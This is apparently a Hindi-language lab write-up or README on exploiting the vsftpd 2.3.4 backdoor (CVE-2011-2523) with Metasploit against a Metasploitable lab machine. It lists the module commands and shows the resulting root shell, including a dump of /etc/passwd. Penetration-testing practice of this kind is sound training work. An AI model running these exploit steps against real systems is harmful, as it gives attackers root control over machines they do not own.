
vsftpd 2.3.4 (CVE-2011-2523) का भेद्यता आकलन और शोषण Metasploit का उपयोग करके। पूर्ण रिपोर्ट और रूट एक्सेस का प्रमाण शामिल।
vsftpd 2.3.4में एक ज्ञात भेद्यता का Metasploit का उपयोग करके शोषण।
192.168.150.133exploit/unix/ftp/vsftpd_234_backdoorvsftpd 2.3.4 में एक दुर्भावनापूर्ण बैकडोर है जो एक विशेष रूप से तैयार उपयोगकर्ता नाम (:) में समाप्त) प्राप्त होने पर पोर्ट 6200 पर एक कमांड शेल खोलता है।
CVE: CVE-2011-2523
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run
whoami
> root
id
> uid=0(root) gid=0(root)
hostname
> metasploitable
uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...
cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...
रूट शेल एक्सेस हमलावर को लक्ष्य प्रणाली पर पूर्ण नियंत्रण देता है — जिसमें विशेषाधिकार वृद्धि, पार्श्व गति, डेटा निष्कासन और स्थायी पहुँच शामिल है।
📝 इस रिपॉजिटरी में पूर्ण PDF रिपोर्ट उपलब्ध है: vsftpd-exploit-report.pdf
🔥 द्वारा बनाया गया vedpakhare